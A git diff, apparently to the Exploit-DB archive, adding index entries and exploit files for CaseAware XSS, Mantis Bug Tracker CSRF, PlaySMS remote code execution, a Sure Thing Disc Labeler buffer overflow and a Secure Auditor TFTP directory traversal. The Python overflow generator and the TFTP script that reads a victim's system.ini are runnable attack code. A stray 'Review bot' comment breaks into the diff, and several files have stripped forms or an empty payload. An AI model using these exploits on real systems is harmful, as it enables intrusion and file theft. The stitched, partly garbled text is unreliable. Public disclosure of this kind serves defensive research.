diff --git a/files.csv b/files.csv
index 177619fa7..2f86dbeaf 100644
--- a/files.csv
+++ b/files.csv
@@ -5503,6 +5503,7 @@ id,file,description,date,author,platform,type,port
 42019,platforms/multiple/dos/42019.txt,"Adobe Flash - Out-of-Bounds Read in Getting TextField Width",2017-05-17,"Google Security Research",multiple,dos,0
 42021,platforms/windows/dos/42021.txt,"Microsoft Windows - Running Object Table Register ROTFLAGS_ALLOWANYCLIENT Privilege Escalation",2017-05-17,"Google Security Research",windows,dos,0
 42027,platforms/multiple/dos/42027.html,"Mozilla Firefox 50 < 55 - Stack Overflow Denial of Service",2017-05-17,"Geeknik Labs",multiple,dos,0
+42040,platforms/windows/dos/42040.py,"Sure Thing Disc Labeler 6.2.138.0 - Buffer Overflow (PoC)",2017-05-19,"Chance Johnson",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -15524,6 +15525,7 @@ id,file,description,date,author,platform,type,port
 42025,platforms/php/remote/42025.rb,"BuilderEngine 3.5.0 - Arbitrary File Upload and Execution (Metasploit)",2017-05-17,Metasploit,php,remote,80
 42026,platforms/xml/remote/42026.py,"Oracle PeopleSoft - XML External Entity to SYSTEM Remote Code Execution",2017-05-17,"Ambionics Security",xml,remote,0
 42031,platforms/win_x86-64/remote/42031.py,"Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,win_x86-64,remote,445
+42041,platforms/windows/remote/42041.txt,"Secure Auditor 3.0 - Directory Traversal",2017-05-20,hyp3rlinx,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -37879,3 +37881,6 @@ id,file,description,date,author,platform,type,port
 42037,platforms/java/webapps/42037.txt,"ManageEngine ServiceDesk Plus 9.0 - Authentication Bypass",2017-05-19,ByteM3,java,webapps,0
 42038,platforms/php/webapps/42038.txt,"PlaySMS 1.4 - Remote Code Execution",2017-05-19,"Touhid M.Shaikh",php,webapps,80
 42039,platforms/hardware/webapps/42039.txt,"D-Link DIR-600M Wireless N 150 - Authentication Bypass",2017-05-19,"Touhid M.Shaikh",hardware,webapps,0
+42042,platforms/php/webapps/42042.txt,"KMCIS CaseAware - Cross-Site Scripting",2017-05-20,justpentest,php,webapps,0
+42043,platforms/php/webapps/42043.txt,"Mantis Bug Tracker 1.3.10/2.3.0 - Cross-Site Request Forgery",2017-05-20,hyp3rlinx,php,webapps,0
+42044,platforms/php/webapps/42044.txt,"PlaySMs 1.4 - 'import.php' Remote Code Execution",2017-05-21,"Touhid M.Shaikh",php,webapps,0
diff --git a/platforms/php/webapps/42042.txt b/platforms/php/webapps/42042.txt new file mode 100755 index 000000000..69807c2a6 --- /dev/null +++ b/platforms/php/webapps/42042.txt @@ -0,0 +1,27 @@ +# Exploit Title: CaseAware Cross Site Scripting Vulnerability +# Date: 20th May 2017 +# Exploit Author: justpentest +# Vendor Homepage: https://caseaware.com/ +# Version: All the versions +# Contact: transform2secure@gmail.com +# CVE : 2017-5631 + +Source: https://nvd.nist.gov/vuln/detail/CVE-2017-5631#vulnDescriptionTitle + +1) Description: +An issue with respect to input sanitization was discovered in KMCIS +CaseAware. Reflected cross site scripting is present in the user parameter +(i.e., "usr") that is transmitted in the login.php query string. So +bascially username parameter is vulnerable to XSS. + +2) Exploit: + +https://caseaware.abc.com:4322/login.php?mid=0&usr=admin'>Click_ME<' +---------------------------------------------------------------------------------------- + +3) References: + +https://www.openbugbounty.org/incidents/228262/ +https://nvd.nist.gov/vuln/detail/CVE-2017-5631#vulnDescriptionTitle + diff --git a/platforms/php/webapps/42043.txt b/platforms/php/webapps/42043.txt new file mode 100755 index 000000000..5fa42139b --- /dev/null +++ b/platforms/php/webapps/42043.txt 
@@ -0,0 +1,109 @@ +[+] Credits: John Page a.k.a hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-CSRF-PERMALINK-INJECTION.txt +[+] ISR: ApparitionSec + + + +Vendor: +================ +www.mantisbt.org + + + +Product: +========= +Mantis Bug Tracker +1.3.10 / v2.3.0 + + +MantisBT is a popular free web-based bug tracking system. It is written in PHP works with MySQL, MS SQL, and PostgreSQL databases. + + + +Vulnerability Type: +======================== +CSRF Permalink Injection + + + +CVE Reference: +============== +CVE-2017-7620 + + + +Security Issue: +================ +Remote attackers can inject arbitrary permalinks into the mantisbt Web Interface if an authenticated user visits a malicious webpage. + +Vuln code in "string_api.php" PHP file, under mantis/core/ did not account for supplied backslashes. +Line: 270 + +# Check for URL's pointing to other domains + +if( 0 == $t_type || empty( $t_matches['script'] ) || + + 3 == $t_type && preg_match( '@(?:[^:]*)?:/*@', $t_url ) > 0 ) { + + + + return ( $p_return_absolute ? $t_path . '/' : '' ) . 'index.php'; + +} + + + +# Start extracting regex matches + +$t_script = $t_matches['script']; +$t_script_path = $t_matches['path']; + + + + +Exploit/POC: +============= +
+ +
+ +OR + +
+ +
+ + + +Network Access: +=============== +Remote + + + + +Severity: +========= +Medium + + + +Disclosure Timeline: +============================= +Vendor Notification: April 9, 2017 +Vendor Release Fix: May 15, 2017 +Vendor Disclosed: May 20, 2017 +May 20, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/platforms/php/webapps/42044.txt b/platforms/php/webapps/42044.txt new file mode 100755 index 000000000..ef0e2847e --- /dev/null +++ b/platforms/php/webapps/42044.txt 
@@ -0,0 +1,128 @@ +# Exploit Title: PlaySMS 1.4 Remote Code Execution using Phonebook import Function in import.php +# Date: 21-05-2017 +# Software Link: https://playsms.org/download/ +# Version: 1.4 +# Exploit Author: Touhid M.Shaikh +# Contact: http://twitter.com/touhidshaikh22 +# Website: http://touhidshaikh.com/ +# Category: webapps + +1. Description + +Code Execution using import.php + + We know import.php accept file and just read content + not stored in server. But when we stored payload in our backdoor.csv + and upload to phonebook. Its execute our payload and show on next page in field (in NAME,MOBILE,Email,Group COde,Tags) accordingly . + + In My case i stored my vulnerable code in my backdoor.csv files's Name field . + + But There is one problem in execution. Its only execute in built function and variable which is used in application. + + That why the server not execute our payload directly. Now i Use "" in name field and change our user agent to any command which u want to execute command. Bcz it not execute directly . + +Example of my backdoor.csv file content +----------------------MY FILE CONTENT------------------------------------ +Name Mobile Email Group code Tags + 22 + +--------------------MY FILE CONTENT END HERE------------------------------- + + + + For More Details : www.touhidshaikh.com/blog/ + + For Video Demo : https://www.youtube.com/watch?v=KIB9sKQdEwE + + +2. Proof of Concept + +Login as regular user (created user using index.php?app=main&inc=core_auth&route=register): + +Go to : +http://127.0.0.1/playsms/index.php?app=main&inc=feature_phonebook&route=import&op=list + + +And Upload my malicious File.(backdoor.csv) +and change our User agent. + + + This is Form For Upload Phonebook. +----------------------Form for upload CSV file ---------------------- +
+" . _CSRF_FORM_ . " +

" . _('Please select CSV file for phonebook entries') . "

+

+

" . _('CSV file format') . " : " . _('Name') . ", " . _('Mobile') . ", " . _('Email') . ", " . _('Group code') . ", " . _('Tags') . "

+

+
+------------------------------Form ends --------------------------- + + + +-------------Read Content and Display Content----------------------- + + case "import": + $fnpb = $_FILES['fnpb']; + $fnpb_tmpname = $_FILES['fnpb']['tmp_name']; + $content = " +

" . _('Phonebook') . "

+

" . _('Import confirmation') . "

+
+ + + + + + + + + "; + if (file_exists($fnpb_tmpname)) { + $session_import = 'phonebook_' . _PID_; + unset($_SESSION['tmp'][$session_import]); + ini_set('auto_detect_line_endings', TRUE); + if (($fp = fopen($fnpb_tmpname, "r")) !== FALSE) { + $i = 0; + while ($c_contact = fgetcsv($fp, 1000, ',', '"', '\\')) { + if ($i > $phonebook_row_limit) { + break; + } + if ($i > 0) { + $contacts[$i] = $c_contact; + } + $i++; + } + $i = 0; + foreach ($contacts as $contact) { + $c_gid = phonebook_groupcode2id($uid, $contact[3]); + if (!$c_gid) { + $contact[3] = ''; + } + $contact[1] = sendsms_getvalidnumber($contact[1]); + $contact[4] = phonebook_tags_clean($contact[4]); + if ($contact[0] && $contact[1]) { + $i++; + $content .= " + + + + + + + + "; + $k = $i - 1; + $_SESSION['tmp'][$session_import][$k] = $contact; + } + } + +------------------------------code ends --------------------------- + + +Bingoo..... + + +*------------------My Friends---------------------------* +|Pratik K.Tejani, Rehman, Taushif,Charles Babbage | +*---------------------------------------------------* \ No newline at end of file diff --git a/platforms/windows/dos/42040.py b/platforms/windows/dos/42040.py new file mode 100755 index 000000000..64a51e834 --- /dev/null +++ b/platforms/windows/dos/42040.py 
@@ -0,0 +1,33 @@ +# Exploit Title: Sure Thing Disc Labeler - Stack Buffer Overflow (PoC) +# Date: 5-19-17 +# Exploit Author: Chance Johnson (albatross@loftwing.net) +# Vendor Homepage: http://www.surething.com/ +# Software Link: http://www.surething.com/disclabeler +# Version: 6.2.138.0 +# Tested on: Windows 7 x64 / Windows 10 +# +# Usage: +# Open the project template generated by this script. +# If a readable address is placed in AVread, no exception will be thrown +# and a return pointer will be overwritten giving control over EIP when +# the function returns. + +header = '\x4D\x56\x00\xFF\x0C\x00\x12\x00\x32\x41\x61\x33\x08\x00\x5E\x00' +header += '\x61\x35\x41\x61\x36\x41\x61\x37\x41\x61\x38\x41\x61\x39\x41\x62' +header += '\x30\x41\x62\x31\x41\x62\x32\x41\x62\x33\x41\x62\x34\x41\x62\x35' +header += '\x41\x62\x36\x41\x78\x37\x41\x62\x38\x41\x62\x39\x41\x63\x30\x41' +header += '\x0C\x00\x41\x63\x78\x1F\x00\x00\x41\x63\x34\x41\x63\x35\x41\x63' + +junk1 = 'D'*10968 +EIP = 'A'*4 # Direct RET overwrite +junk2 = 'D'*24 +AVread = 'B'*4 # address of any readable memory +junk3 = 'D'*105693 + +buf = header + junk1 + EIP + junk2 + AVread + junk3 + +print "[+] Creating file with %d bytes..." % len(buf) + +f=open("exp.std",'wb') +f.write(buf) +f.close() diff --git a/platforms/windows/remote/42041.txt b/platforms/windows/remote/42041.txt new file mode 100755 index 000000000..295135634 --- /dev/null +++ b/platforms/windows/remote/42041.txt 
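Review bot: At the end of the script the output file is opened, written and closed by hand (`f=open("exp.std",'wb')` … `f.close()`), so a write that raises leaves the handle open; a context manager does the cleanup for free: `with open("exp.std", "wb") as f:` followed by `f.write(buf)`. The bare `print` statement and the `str` escape sequences written to a binary handle also pin the script to Python 2, which the header comments do not state; a `# Tested with: Python 2` line next to the existing `Tested on:` line (or a `#!/usr/bin/env python2` shebang) would document that. The `header` literal is the one part of the file with no explanatory comment; a one-line note on what it represents (presumably the leading bytes of the project template the Usage block refers to) would help a reader.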
@@ -0,0 +1,99 @@ +[+] Credits: John Page aka HYP3RLINX +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt +[+] ISR: ApparitionSec + + + +Vendor: +==================== +www.secure-bytes.com + + + +Product: +===================== +Secure Auditor - v3.0 + +Secure Auditor suite is a unified digital risk management solution for conducting automated audits on Windows, Oracle and SQL databases +and Cisco devices. + + + +Vulnerability Type: +=================== +Directory Traversal + + + +CVE Reference: +============== +CVE-2017-9024 + + + +Security Issue: +================ +Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a +Directory Traversal issue in its TFTP Server, allowing attackers to read arbitrary files via ../ sequences in a pathname. + + + + +Exploit/POC: +============= +import sys,socket + +print 'Secure Auditor v3.0 / Cisco Config Manager' +print 'TFTP Directory Traversal Exploit' +print 'Read ../../../../Windows/system.ini POC' +print 'hyp3rlinx' + +HOST = raw_input("[IP]> ") +FILE = '../../../../Windows/system.ini' +PORT = 69 + +PAYLOAD = "\x00\x01" #TFTP Read +PAYLOAD += FILE+"\x00" #Read system.ini using directory traversal +PAYLOAD += "netascii\x00" #TFTP Type + +s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +s.sendto(PAYLOAD, (HOST, PORT)) +out = s.recv(1024) +s.close() + +print "Victim Data located on : %s " %(HOST) +print out.strip() + + + +Network Access: +=============== +Remote + + + + +Severity: +========= +High + + + +Disclosure Timeline: +================================== +Vendor Notification: May 10, 2017 +No replies +May 20, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. 
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file
*" . _('Name') . "" . _('Mobile') . "" . _('Email') . "" . _('Group code') . "" . _('Tags') . "
$i.$contact[0]$contact[1]$contact[2]$contact[3]$contact[4]